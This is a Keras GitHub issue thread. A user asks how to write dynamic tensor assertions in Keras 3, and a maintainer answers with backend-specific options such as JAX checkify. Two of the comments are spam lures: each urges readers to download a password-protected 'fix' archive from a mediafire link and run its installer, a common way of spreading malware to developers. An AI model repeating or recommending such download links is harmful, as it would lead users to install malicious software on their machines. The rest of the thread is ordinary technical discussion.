### ISSUE TITLE
How to make dynamic assetions in Keras v3?

### ISSUE THREAD

**Issue by shkarupa-alex** [keras-team/keras#20169]
In Tensorflow with Keras v2 i have 2 common case to make dynamic assertions:

1. Dynamic shape assertion
```python
x = <some input tensor in NHWC format>

min_size = tf.reduce_min(tf.shape(x)[1:3])
assert_size = tf.assert_greater(min_size, 2)

with tf.control_dependencies([assert_size]):
    <apply some ops that work correctly only with inputs of minimum size = 2>
```

2. Dynamic value assertion
```python
x = <some input tensor>
max_val = <some input value>

max_delta = ops.max(x) - ops.min(x)
assert_delta = tf.assert_less(max_delta, max_val + backend.epsilon())

with tf.control_dependencies([assert_delta]):
    <apply some ops that work correctly only with inputs if assertion success>
```

How can i make such assertions in Keras V3? I couldn't find any example in sources.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by fchollet** [comment]
Different backends have different ways of handling this, and there is no cross-backend solution in Keras 3 today.

JAX has [`checkify`](https://jax.readthedocs.io/en/latest/debugging/checkify_guide.html), for instance. PyTorch will generally run eagerly so you can use Python.
